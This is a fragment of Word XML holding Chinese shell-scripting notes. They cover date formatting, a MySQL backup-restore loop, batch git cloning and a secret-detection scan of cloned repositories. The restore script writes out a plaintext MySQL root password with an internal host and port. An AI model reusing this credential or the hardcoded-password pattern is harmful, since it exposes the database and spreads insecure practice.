        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>2013-02-19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6400D9CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[root@root ~]# date "+%H:%M:%S"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB05808" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>13:13:59</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2DD41D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[root@root ~]# date "+%Y-%m-%d %H:%M:%S"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282F58FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>2013-02-19 13:14:19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B75D6E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[root@root ~]# date "+%Y_%m_%d %H:%M:%S"  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C1179B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>2013_02_19 13:14:58</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B3730B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[root@root ~]# date -d today </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63514FC0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Tue Feb 19 13:10:38 CST 2013</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416D6206" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[root@root ~]# date -d now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5661E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Tue Feb 19 13:10:43 CST 2013</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F615E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[root@root ~]# date -d tomorrow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B35A52" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Wed Feb 20 13:11:06 CST 2013</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229CCAFE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[root@root ~]# date -d yesterday</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74242586" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Mon Feb 18 13:11:58 CST 2013</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C068D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5581B307" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间加减</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBDE79C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>date +%Y%m%d         //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示现在天年月日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6B443B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>date +%Y%m%d --date="+1 day"  //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示后一天的日期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01256F51" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>date +%Y%m%d --date="-1 day"  //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示前一天的日期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142C2EDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>date +%Y%m%d --date="-1 month"  //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示上一月的日期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0E0C0D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>date +%Y%m%d --date="+1 month"  //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示下一月的日期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF15687" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>date +%Y%m%d --date="-1 year"  //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示前一年的日期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74916EC1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>date +%Y%m%d --date="+1 year"  //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示下一年的日期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A52C9BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>date=`date -d -${t}day '+%Y%m%d'` //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为前几天</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25123998" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47383F34" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53DD9691" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>实际案例：存在年月目录判断</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E608FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F4140C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB2027A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>检查今天日期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3715CE60" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Y_M=`date "+%Y_%m"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9AFA5C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>找到今天备份目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06839230" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>root="/home/syj/wenhailin/$Y_M"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008BEB19" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t>遍历</w:t>
      </w:r>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C6BF47" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>dir=`/usr/bin/ls $root/*.sql`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA4CC2D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>for table in $dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6639C754" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A0D62E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  echo "</w:t>
      </w:r>
      <w:r>
        <w:t>正在备份</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> $table";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2245756F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  mysql -uroot -P23306 -h192.168.3.199 -p1qaz@WSX sca &lt; $table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB6EB2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6924F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55BC0F17" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "</w:t>
      </w:r>
      <w:r>
        <w:t>删除所有备份文件</w:t>
      </w:r>
      <w:r>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9BCCC2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>rm $root/*.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360AFB6E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "</w:t>
      </w:r>
      <w:r>
        <w:t>删除完毕</w:t>
      </w:r>
      <w:r>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5C7357" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BC1BC48" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7260CA4E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="183" w:name="_Toc159779644"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断目录下文件还是目录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="183"/>
    </w:p>
    <w:p w14:paraId="063DFC5D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>#!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1307302A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>for file in ./*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CF6D76" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A7162B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if test -d $file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120A4258" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9FF1D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        echo $file </w:t>
      </w:r>
      <w:r>
        <w:t>是目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490D0CE9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B517A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0258D5FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2515CB23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="501EC619" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="184" w:name="_Toc159779645"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>批量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git clone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仓库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="184"/>
    </w:p>
    <w:p w14:paraId="47A28965" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="417DB924" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址写道一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> url.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F345E91" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="185" w:name="OLE_LINK41"/>
      <w:r>
        <w:t>cat url.txt | while read line ; do git clone $line $(echo $line | awk -F 'com/' '{print $2}')  ; done;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="185"/>
    </w:p>
    <w:p w14:paraId="671C94E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E892C8C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F7ECD66" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E9ABA64" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="186" w:name="_Toc159779646"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SecretDetect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>批量扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仓库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="186"/>
    </w:p>
    <w:p w14:paraId="50ED5D60" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D241DEB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9C8562" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68B5BF3D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "</w:t>
      </w:r>
      <w:r>
        <w:t>开始运行</w:t>
      </w:r>
      <w:r>
        <w:t>$0" `date "+%H:%M:%S"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7681AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>for file in /var/GitCloneTest/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2059564A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">do </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E500E35" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    echo "</w:t>
      </w:r>
      <w:r>
        <w:t>开始时间</w:t>
      </w:r>
      <w:r>
        <w:t>" `date "+%H:%M:%S"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003DB903" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    echo "</w:t>
      </w:r>
      <w:r>
        <w:t>扫描地址</w:t>
      </w:r>
      <w:r>
        <w:t>: $file"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEF4C94" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if test -d $file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2959B537" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7189D2F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        echo `/home/syj/SecretDetection detect -s $file -f csv -r /home/syj/shenyanjian/$file-git.csv`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6F8C0C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055C904A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    echo "</w:t>
      </w:r>
      <w:r>
        <w:t>结束时间</w:t>
      </w:r>
      <w:r>
        <w:t>" `date "+%H:%M:%S"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1817E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7659315C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C784B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "</w:t>
      </w:r>
      <w:r>
        <w:t>结束运行</w:t>
      </w:r>
      <w:r>
        <w:t>$0" `date "+%H:%M:%S"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3B48B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
